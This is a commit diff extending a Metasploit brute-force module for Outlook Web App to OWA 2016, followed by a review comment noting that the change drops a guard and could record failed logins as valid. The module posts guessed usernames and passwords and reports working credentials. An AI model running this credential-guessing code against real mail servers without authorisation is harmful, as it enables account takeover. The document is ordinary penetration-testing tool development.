initial OWA 2016 support

Brent Cook
2017-10-31 14:48:42 -05:00
parent 3d67d2ed12
commit 56c00a8cb6
+19 -9
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
super(
'Name' => 'Outlook Web App (OWA) Brute Force Utility',
'Description' => %q{
This module tests credentials on OWA 2003, 2007, 2010, and 2013 servers.
This module tests credentials on OWA 2003, 2007, 2010, 2013, and 2016 servers.
},
'Author' =>
[
@@ -68,6 +68,15 @@ class MetasploitModule < Msf::Auxiliary
'InboxPath' => '/owa/',
'InboxCheck' => /Inbox|logoff\.owa/
}
],
[
'OWA_2016',
{
'Description' => 'OWA version 2016',
'AuthPath' => '/owa/auth.owa',
'InboxPath' => '/owa/',
'InboxCheck' => /Inbox|logoff\.owa/
}
]
],
'DefaultAction' => 'OWA_2013',
@@ -158,13 +167,13 @@ class MetasploitModule < Msf::Auxiliary
}
if datastore['SSL']
if action.name == "OWA_2013"
if ["OWA_2013", "OWA_2016"].include?(action.name)
data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
else
data = 'destination=https://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
end
else
if action.name == "OWA_2013"
if ["OWA_2013", "OWA_2016"].include?(action.name)
data = 'destination=http://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
else
data = 'destination=http://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
@@ -201,12 +210,12 @@ class MetasploitModule < Msf::Auxiliary
vprint_status("#{msg} Resolved hostname '#{datastore['RHOST']}' to address #{res.peerinfo['addr']}")
end
if action.name != "OWA_2013" and res.get_cookies.empty?
if !["OWA_2013", "OWA_2016"].include?(action.name) && res.get_cookies.empty?
print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
return :abort
end
if action.name == "OWA_2013"
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
if ["OWA_2013", "OWA_2016"].include?(action.name)
# Check for a response code to make sure login was valid. Changes from 2010 to 2013 / 2016
# Check if the password needs to be changed.
if res.headers['location'] =~ /expiredpassword/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}': NOTE password change required")
@@ -222,8 +231,9 @@ class MetasploitModule < Msf::Auxiliary
# No password change required moving on.
# Check for valid login but no mailbox setup
if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}': NOTE a mailbox is not setup")
print_good("server type: #{res.headers["X-FEServer"]}")
if res.headers['location'] =~ /owa/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
report_cred(
ip: res.peerinfo['addr'],
port: datastore['RPORT'],
@@ -235,7 +245,7 @@ class MetasploitModule < Msf::Auxiliary
end
unless location = res.headers['location']
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
print_error("#{msg} No HTTP redirect. This is not OWA 2013 / 2016 system, aborting.")
return :abort
end
reason = location.split('reason=')[1]
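Review bot: In the hunk at `@@ -222,8 +231,9 @@`, the new success test `if res.headers['location'] =~ /owa/` drops the `!~ /reason/` guard that the replaced line had, so any redirect whose Location contains `owa` is now reported as a successful login and handed to `report_cred`. The `location.split('reason=')[1]` handling further down suggests that rejected logins are also redirected with a `reason=` parameter, presumably under an `/owa/` path, in which case failed attempts would be recorded as valid credentials; I would keep the guard, `if res.headers['location'] =~ /owa/ && res.headers['location'] !~ /reason/`. The added `print_good("server type: ...")` runs before the outcome is known, lacks the `#{msg}` prefix, and prints an empty value when `X-FEServer` is absent, so `vprint_status("#{msg} server type: #{res.headers['X-FEServer']}")` would fit the surrounding output better. The comment above it still says "no mailbox setup" although the new message no longer mentions a mailbox. The enclosing method begins and ends outside the visible hunks.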